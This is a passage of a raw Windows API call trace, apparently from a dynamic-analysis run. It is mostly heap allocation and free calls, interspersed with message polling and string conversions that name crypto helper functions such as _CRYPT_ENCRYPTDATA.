0x43e2580 [0114.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0114.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x66d) returned 0x43faa98 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43faa98 | out: hHeap=0x1780000) returned 1 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.301] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0114.301] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0114.301] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0114.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x66d) returned 0x43faa98 [0114.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0114.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0114.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0114.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0114.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x66d) returned 0x43fb788 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0114.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0114.303] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0114.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0114.304] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0114.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0114.304] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0114.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0114.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0114.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0114.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0114.305] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0114.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0114.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0114.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.306] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0114.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0114.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0114.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0114.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0114.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0114.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0114.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0114.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0114.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0114.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0114.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.307] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0114.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0114.307] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0114.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0114.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0114.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0114.308] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0114.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0114.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0114.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0114.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0114.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0114.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0114.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0114.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0114.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0114.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0114.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0114.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0114.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0114.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0114.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0114.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0114.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0114.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0114.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0114.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0114.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0114.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0114.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0114.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0114.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0114.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0114.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0114.311] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0114.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0114.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0114.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0114.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0114.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0114.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 